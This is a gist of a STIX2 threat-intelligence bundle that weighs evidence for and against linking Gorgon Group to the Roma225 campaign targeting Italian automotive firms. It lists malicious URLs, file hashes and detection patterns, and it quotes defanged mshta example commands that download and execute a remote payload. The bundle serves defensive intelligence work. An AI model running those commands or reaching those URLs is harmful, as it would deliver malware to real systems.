
@traut
Forked from CaitlinHuey/hypothesis-STIX2.json
Created February 29, 2024 14:50
Representing a structured Hypothesis (STIX2) - co-authored by Sergey Polzunov
{
"objects": [
{
"labels": [
"source--eiq-fusion"
],
"name": "EclecticIQ Fusion Center",
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/www.eclecticiq.com\/fusion-center"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"created": "2019-01-14T10:09:52.963Z",
"identity_class": "organization",
"sectors": [
"cyber-threat-intelligence"
],
"id": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"type": "identity",
"modified": "2019-03-06T12:13:36.090Z"
},
{
"id": "x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"labels": [
"source--eiq-fusion"
],
"object_refs": [
"campaign--1237e349-a7b1-4c44-bbc2-bab93b96a831",
"threat-actor--eacd6e7c-b826-4293-abe1-361c1a26a675"
],
"created": "2019-01-27T21:15:21.001Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"name": "Gorgon Group is associated with Roma225 Campaign",
"description": "Similar attack patterns, historical activity, use of same malware",
"x_eclecticiq_alternative_hypothesis_refs": [
"x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87"
],
"x_eclecticiq_weight_score": "low",
"type": "x-eclecticiq-hypothesis",
"modified": "2019-02-20T12:12:31.309Z"
},
{
"id": "relationship--4d850df6-5665-4233-b225-f7b5907da52e",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b",
"target_ref": "x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0",
"description": "RevengeRAT seen in Roma225",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 7,
"x_eclecticiq_credibility": 10,
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "relationship--91250d8c-c7d3-4885-a1d5-1fd62108fc25",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "indicator--5b46ea0b-0763-59e2-b169-2a32718a1214",
"target_ref": "x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0",
"description": "usage of shared infrastructure",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 7,
"x_eclecticiq_credibility": 3,
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"labels": [
"source--eiq-fusion"
],
"created": "2019-01-27T21:15:21.001Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"object_refs": [
"campaign--1237e349-a7b1-4c44-bbc2-bab93b96a831"
],
"name": "Gorgon Group is not associated with Roma225 Campaign",
"description": "Not enough evidence that supports that Gorgon Group is behind Roma225",
"x_eclecticiq_alternative_hypothesis_refs": [
"x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0"
],
"x_eclecticiq_weight_score": "high",
"type": "x-eclecticiq-hypothesis",
"modified": "2019-02-20T12:12:31.309Z"
},
{
"id": "relationship--c82c8b90-cb52-415d-a993-81c40b993a1d",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b",
"target_ref": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"description": "MSHTA.exe not used by Gorgon Group before",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 10,
"x_eclecticiq_credibility": 9,
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "relationship--c7d5c470-8009-4fa8-8a6f-e647e71054bf",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "malware--46142e30-38e6-5c0e-b2e4-ffcfbc443426",
"target_ref": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"description": "RevengeRAT not exclusively used by Gorgon Group",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 10,
"x_eclecticiq_credibility": 9,
"external_references": [
{
"source_name": "Unit42"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "relationship--ff1d0e39-50cb-4e70-b6f9-c462e7576698",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "indicator--5b46ea0b-0763-59e2-b169-2a32718a1214",
"target_ref": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"description": "DDNS and use of Blogspot does not align with Gorgon Group Infrastructure",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 10,
"x_eclecticiq_credibility": 9,
"external_references": [
{
"source_name": "Unit42"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "relationship--0d88fa85-ac8e-4a9a-b2f6-25b64fa7a711",
"type": "relationship",
"relationship_type": "x-evidence-of",
"created": "2019-02-20T12:12:31.309Z",
"modified": "2019-02-20T12:12:31.309Z",
"source_ref": "indicator--2244ef43-6919-4f57-96ad-a25c4f9a79aa",
"target_ref": "x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"description": "DDNS and use of Blogspot does not align with Gorgon Group Infrastructure",
"created_by_ref": "identity--f431f809-377b-45e0-aa1c-6a4751cae5ff",
"x_eclecticiq_evidence_type": "secondary-source",
"x_eclecticiq_relevance": 10,
"x_eclecticiq_credibility": 9,
"external_references": [
{
"source_name": "Unit42"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
]
},
{
"id": "report--5c3873b2-709e-42be-8da5-9b09da0f7236",
"name": "Some report about with some conclusions",
"labels": [
"theme--generic-threats",
"source--eiq-fusion"
],
"published": "2019-01-27T21:13:07.241081Z",
"created": "2019-01-27T21:13:07.241Z",
"description": "smart analysis",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"object_refs": [
"x-eclecticiq-hypothesis--f26abb1d-1fc9-488a-97da-cfd45b7717a0",
"x-eclecticiq-hypothesis--38b61755-62f8-440f-97fc-613d04ce8a87",
"campaign--1237e349-a7b1-4c44-bbc2-bab93b96a831"
],
"type": "report",
"modified": "2019-02-20T12:12:31.329Z"
},
{
"id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9",
"definition_type": "tlp",
"definition": {
"tlp": "white"
},
"type": "marking-definition",
"created": "2019-03-06T12:13:36.058Z"
},
{
"id": "indicator--e1a3c8e6-8880-5001-938c-45f05978900b",
"labels": [
"observables",
"theme--generic-threats",
"kill-chain-phase--installation",
"admiralty-code--fairly-reliable",
"threat-actors--espionage",
"malware--dropper",
"theme--apt",
"source--eiq-fusion",
"admiralty-code--probably-true",
"industry-sector--automotive",
"theme--financial-crime",
"theme--critical-infrastructure"
],
"pattern": "[file:name = '.ppa' AND file:name = 'mshta.exe' AND url:value = 'https:\/\/minhacasaminhavidacdt.blogspot.com\/' AND domain-name:value = 'minhacasaminhavidacdt.blogspot.com']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "Indicator for \"Attack Pattern: Macro code in.ppa file invokes mshta.exe tool to download and execute next-stage of the dropper\"",
"created": "2019-01-14T10:09:52.963Z",
"type": "indicator",
"modified": "2019-03-06T12:13:36.059Z"
},
{
"id": "indicator--ef97960a-a76e-5009-91d4-a11bfcddd4c0",
"labels": [
"observables",
"admiralty-code--fairly-reliable",
"threat-actors--espionage",
"theme--apt",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--financial-crime",
"theme--critical-infrastructure"
],
"pattern": "[country-code:value = 'IT' AND industry:value = 'Automotive' AND name:value = 'italian automotive companies' AND country:value = 'Italy']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "Indicator for \"Targeted Victim: Italian Automotive companies\"",
"created": "2019-01-14T10:09:52.963Z",
"type": "indicator",
"modified": "2019-03-06T12:13:36.079Z"
},
{
"id": "indicator--a3bfb553-ee1d-53e8-9dc7-b0ebf12bdc5f",
"labels": [
"observables",
"kill-chain-phase--installation",
"admiralty-code--fairly-reliable",
"admiralty-code--probably-true",
"industry-sector--automotive",
"threat-actors--espionage",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"theme--generic-threats",
"source--eiq-fusion",
"kill-chain--target-manipulation--weaponization",
"theme--financial-crime",
"theme--apt"
],
"pattern": "[url:value = 'https:\/\/minhacasaminhavidacdt.blogspot.com\/' AND domain-name:value = 'minhacasaminhavidacdt.blogspot.com']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "Indicator for \"Attack Pattern: Install a RevengeRAT variant and execute a series of malicious actions\"",
"created": "2019-02-23T16:30:24.836Z",
"type": "indicator",
"modified": "2019-03-06T12:13:36.084Z"
},
{
"id": "indicator--46142e30-38e6-5c0e-b2e4-ffcfbc443426",
"labels": [
"observables",
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"theme--generic-threats",
"theme--apt",
"industry-sector--government-national",
"source--eiq-fusion",
"industry-sector--defense",
"malware--remote-access-trojan",
"theme--critical-infrastructure",
"threat-actors--apt"
],
"pattern": "[malware:value = 'revengerat']",
"valid_from": "2018-11-13T16:08:55.483257Z",
"name": "Indicator for \"Malware: RevengeRAT\"",
"created": "2018-11-13T17:07:33.945Z",
"type": "indicator",
"modified": "2019-03-06T12:13:36.087Z"
},
{
"labels": [
"theme--generic-threats",
"kill-chain-phase--installation",
"admiralty-code--fairly-reliable",
"threat-actors--espionage",
"malware--dropper",
"theme--apt",
"source--eiq-fusion",
"admiralty-code--probably-true",
"industry-sector--automotive",
"theme--financial-crime",
"theme--critical-infrastructure"
],
"name": "Attack Pattern: Macro code in.ppa file invokes mshta.exe tool to download and execute next-stage of the dropper",
"external_references": [
{
"source_name": "mitre-attack",
"external_id": "1170",
"description": "Mshta "
},
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "<p> <\/p><p>The macro code in the .ppa file contains a simple instruction invoking the \u201cmshta.exe\u201d tool to download and execute the next-stage of the dropper retrieved from \u201c<em>hxxps:\/\/minhacasaminhavidacdt.blogspot[.]com\/\u201d.<\/em><\/p><p> <\/p>",
"created": "2019-01-14T10:09:52.963Z",
"id": "attack-pattern--e1a3c8e6-8880-5001-938c-45f05978900b",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 100,
"ingest_time": "2018-12-31T14:45:10.412696+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Theme",
"Theme - Generic Threats"
],
[
"Kill Chain Phases",
"Kill chain phase - Installation"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Theme",
"Theme - Financial Crime"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "Attack Pattern: Macro code in.ppa file invokes mshta.exe tool to download and execute next-stage of the dropper",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}ttp-e2a97bd8-03ac-4080-be45-cc4356a6aae6",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.089Z"
},
{
"labels": [
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"source--eiq-fusion",
"theme--critical-infrastructure",
"targeted-technology--windows",
"theme--apt",
"source--mitre",
"source-type--open-source",
"theme--generic-threats"
],
"name": "Technique\/T1170: Mshta",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "Mshta.exe is a utility that executes Microsoft HTML Applications (HTA). HTA files have the file extension <code>.hta<\/code>. HTAs are standalone applications that execute using the same models and technologies of Internet Explorer, but outside of the browser.\n\nAdversaries can use mshta.exe to proxy execution of malicious .hta files and Javascript or VBScript through a trusted Windows utility. There are several examples of different types of threats leveraging mshta.exe during initial compromise and for execution of code \n\nFiles may be executed by mshta.exe through an inline script: <code>mshta vbscript:Close(Execute(\"GetObject(\"\"script:https[:]\/\/webserver\/payload[.]sct\"\")\"))<\/code>\n\nThey may also be executed directly from URLs: <code>mshta http[:]\/\/webserver\/payload[.]hta<\/code>\n\nMshta.exe can be used to bypass application whitelisting solutions that do not account for its potential use. Since mshta.exe executes outside of the Internet Explorer's security context, it also bypasses browser security settings.",
"created": "2019-03-06T12:07:27.250Z",
"id": "attack-pattern--6ecf2333-f55c-51dd-b5c8-0b678b65ffeb",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-05-15T15:17:03.413053+00:00",
"estimated_threat_start_time": "2018-05-15T15:17:03.413053+00:00",
"half_life": 9000,
"ingest_time": "2018-05-15T15:17:03.413053+00:00",
"source_reliability": "A",
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Targeted Technology",
"Targeted Technology - Operating Systems",
"Targeted Technology - Windows"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - Mitre"
],
[
"Source Type",
"Source Type - Open Source"
],
[
"Theme",
"Theme - Generic Threats"
]
],
"title": "Technique\/T1170: Mshta",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/attack.mitre.org}ttp-65ae5301-b7ce-5451-a730-cbdecc1b8ca2",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.090Z"
},
{
"labels": [
"admiralty-code--fairly-reliable",
"threat-actors--espionage",
"theme--apt",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--financial-crime",
"theme--critical-infrastructure"
],
"name": "Targeted Victim: Italian Automotive companies",
"external_references": [
{
"source_name": "external-url",
"url": "https:\/\/blog.yoroi.company\/research\/the-enigmatic-roma225-campaign\/"
}
],
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"created": "2019-01-14T10:09:52.963Z",
"identity_class": "class",
"sectors": [
"automotive"
],
"id": "identity--ef97960a-a76e-5009-91d4-a11bfcddd4c0",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 100,
"ingest_time": "2018-12-31T14:28:12.542810+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Financial Crime"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "Targeted Victim: Italian Automotive companies",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}ttp-bd3c10b8-0abe-480d-b68e-4c889b03c153",
"type": "identity",
"modified": "2019-03-06T12:13:36.090Z"
},
{
"labels": [
"admiralty-code--completely-reliable",
"admiralty-code--confirmed-by-other-sources",
"theme--generic-threats",
"source-type--open-source",
"source--mitre",
"source--eiq-fusion"
],
"name": "Technique\/PRE-T1123: Obtain\/re-use payloads",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "A payload is the part of the malware which performs a malicious action. The adversary may re-use payloads when the needed capability is already available.SonyDestover",
"created": "2018-11-28T16:31:04.008Z",
"id": "attack-pattern--6ed91203-7f3a-57db-a115-e2ebc5ca1943",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-05-15T15:14:40.036805+00:00",
"estimated_threat_start_time": "2018-05-15T15:14:40.036805+00:00",
"half_life": 9000,
"ingest_time": "2018-05-15T15:14:40.036805+00:00",
"source_reliability": "A",
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Source Type",
"Source Type - Open Source"
],
[
"Source",
"Source - Mitre"
],
[
"Source",
"Source - EIQ Fusion"
]
],
"title": "Technique\/PRE-T1123: Obtain\/re-use payloads",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/attack.mitre.org}ttp-cf03aa28-3049-5c9e-8c55-0e9a34fdb2a3",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.090Z"
},
{
"id": "indicator--24bb51ea-2fb9-587a-86e8-7b0f34e013ae",
"labels": [
"admiralty-code--fairly-reliable",
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure"
],
"pattern": "[url:value = 'https:\/\/minhacasaminhavidacdt.blogspot.com\/' AND domain-name:value = 'minhacasaminhavidacdt.blogspot.com']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "https:\/\/minhacasaminhavidacdt.blogspot.com",
"created": "2019-01-08T11:36:45.187Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T14:44:02.184058+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "https:\/\/minhacasaminhavidacdt.blogspot.com",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-5f07d138-c706-4bae-8978-966b3d660f97",
"type": "indicator",
"modified": "2019-03-06T12:13:36.091Z"
},
{
"id": "indicator--6880007b-2a92-56ef-becb-59973a1f8ad6",
"labels": [
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure",
"admiralty-code--usually-reliable"
],
"pattern": "[file:hashes.MD5 = 'cdb34c32c48c0f2dd387dbf277b4b8ce' AND file:hashes.'SHA-256' = 'e8a765ec824881e1e78defd7c011da735f3e3b954aaf93a4282b6455a1b9afcc']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "e8a765ec824881e1e78defd7c011da735f3e3b954aaf93a4282b6455a1b9afcc",
"created": "2018-12-31T16:08:59.571Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:58:16.842753+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Usually reliable"
]
],
"title": "e8a765ec824881e1e78defd7c011da735f3e3b954aaf93a4282b6455a1b9afcc",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-c9e3b4ae-80ca-4adc-82b1-20b8d25335fd",
"type": "indicator",
"modified": "2019-03-06T12:13:36.093Z"
},
{
"labels": [
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"source--eiq-fusion",
"theme--critical-infrastructure",
"theme--apt",
"source--mitre",
"source-type--open-source",
"theme--generic-threats"
],
"name": "Technique\/T1060: Registry Run Keys \/ Start Folder",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "Adding an entry to the \"run keys\" in the Registry or startup folder will cause the program referenced to be executed when a user logs in. The program will be executed under the context of the user and will have the account's associated permissions level.\n\nAdversaries can use these configuration locations to execute malware, such as remote access tools, to maintain persistence through system reboots. Adversaries may also use [[Technique\/T1036|Masquerading]] to make the Registry entries look as if they are associated with legitimate programs.",
"created": "2019-03-06T12:07:27.250Z",
"id": "attack-pattern--07f560c1-ef9f-56cb-9682-ba3985e0a260",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-05-15T15:17:25.388530+00:00",
"estimated_threat_start_time": "2018-05-15T15:17:25.388530+00:00",
"half_life": 9000,
"ingest_time": "2018-05-15T15:17:25.388530+00:00",
"source_reliability": "A",
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Confirmed by other sources"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Completely reliable"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Theme",
"Theme - APT"
],
[
"Source",
"Source - Mitre"
],
[
"Source Type",
"Source Type - Open Source"
],
[
"Theme",
"Theme - Generic Threats"
]
],
"title": "Technique\/T1060: Registry Run Keys \/ Start Folder",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/attack.mitre.org}ttp-c90ef632-9082-5233-8ee5-c0427940df54",
"type": "attack-pattern",
"modified": "2019-03-06T12:13:36.101Z"
},
{
"id": "indicator--e676bc18-efa3-5a34-99e7-61a53d3e1f67",
"labels": [
"admiralty-code--fairly-reliable",
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure"
],
"pattern": "[url:value = 'http:\/\/cdtmaster.com.br\/' AND domain-name:value = 'cdtmaster.com.br']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "http:\/\/cdtmaster.com.br",
"created": "2019-01-08T11:44:23.038Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:24:42.762225+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Fairly reliable"
],
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
]
],
"title": "http:\/\/cdtmaster.com.br",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-a32f0b25-0382-4b0d-9ebf-c863bfc995b6",
"type": "indicator",
"modified": "2019-03-06T12:13:36.102Z"
},
{
"id": "indicator--cc6fe40d-af7d-5a9c-bde1-b151101f5c1d",
"labels": [
"theme--generic-threats",
"threat-actors--espionage",
"theme--apt",
"malware--dropper",
"source--eiq-fusion",
"industry-sector--automotive",
"admiralty-code--probably-true",
"theme--critical-infrastructure",
"admiralty-code--usually-reliable"
],
"pattern": "[file:hashes.'SHA-256' = '702e5cc9462e464c8c29c832fe0d1ecd5cd7740cc2cbceecfd70e566da8194a1' AND file:hashes.MD5 = 'cdb34c32c48c0f2dd387dbf277b4b8ce']",
"valid_from": "2018-12-27T05:00:00Z",
"name": "702e5cc9462e464c8c29c832fe0d1ecd5cd7740cc2cbceecfd70e566da8194a1",
"created": "2018-12-31T16:08:59.571Z",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-12-27T05:00:00+00:00",
"estimated_threat_start_time": "2018-12-27T05:00:00+00:00",
"half_life": 10,
"ingest_time": "2018-12-31T15:58:50.373637+00:00",
"source_reliability": "A",
"tags": [
],
"taxonomy_paths": [
[
"Theme",
"Theme - Generic Threats"
],
[
"Threat Actors",
"Threat Actors - Espionage"
],
[
"Theme",
"Theme - APT"
],
[
"Malware ",
"Malware - Dropper"
],
[
"Source",
"Source - EIQ Fusion"
],
[
"Industry Sector",
"Industry Sector - Automotive"
],
[
"Admiralty Code",
"Admiralty Code - Credibility",
"Admiralty Code - Probably True"
],
[
"Theme",
"Theme - Critical Infrastructure"
],
[
"Admiralty Code",
"Admiralty Code - Reliability",
"Admiralty Code - Usually reliable"
]
],
"title": "702e5cc9462e464c8c29c832fe0d1ecd5cd7740cc2cbceecfd70e566da8194a1",
"tlp_color": "WHITE"
},
"x_eclecticiq_stix1_id": "{https:\/\/www.eclecticiq.com\/ns}indicator-dcf359a2-2643-45b2-9b61-999addff3bbf",
"type": "indicator",
"modified": "2019-03-06T12:13:36.104Z"
},
{
"labels": [
"admiralty-code--confirmed-by-other-sources",
"admiralty-code--completely-reliable",
"source--eiq-fusion",
"targeted-technology--windows",
"theme--apt",
"source--mitre",
"source-type--open-source",
"theme--generic-threats"
],
"name": "Technique\/T1112: Modify Registry",
"object_marking_refs": [
"marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9"
],
"description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in [[Persistence]] and [[Execution]].\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility Reg may be used for local or remote Registry modification. Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API (see examples).\n\nThe Registry of a remote system may be modified to aid in execution of files as part of [[Lateral Movement]]. It requires the remote Registry service to be running on the target system. Often [[Technique\/T1078|Valid Accounts]] are required, along with access to the remote system's [[Technique\/T1077|Windows Admin Shares]] for RPC communication.",
"created": "2019-03-06T12:07:27.250Z",
"id": "attack-pattern--a298e1a5-1f98-51af-b4c9-aebe23bb246d",
"x_eclecticiq_meta": {
"estimated_observed_time": "2018-05-15T15:17:02.750356+00:00",
"estimated_threat_start_time": "2018-05-15T15:17:02.750356+00:00",
"half_life": 9000,
"ingest_time": "2018-05-15T15:17:02.750356+00:00",
